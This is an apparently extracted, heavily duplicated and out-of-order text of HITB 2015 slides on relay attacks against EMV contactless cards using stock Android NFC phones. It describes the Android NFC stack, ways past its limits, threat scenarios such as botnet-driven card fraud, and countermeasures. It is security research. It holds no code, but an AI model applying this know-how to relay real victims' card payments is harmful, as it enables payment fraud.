Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
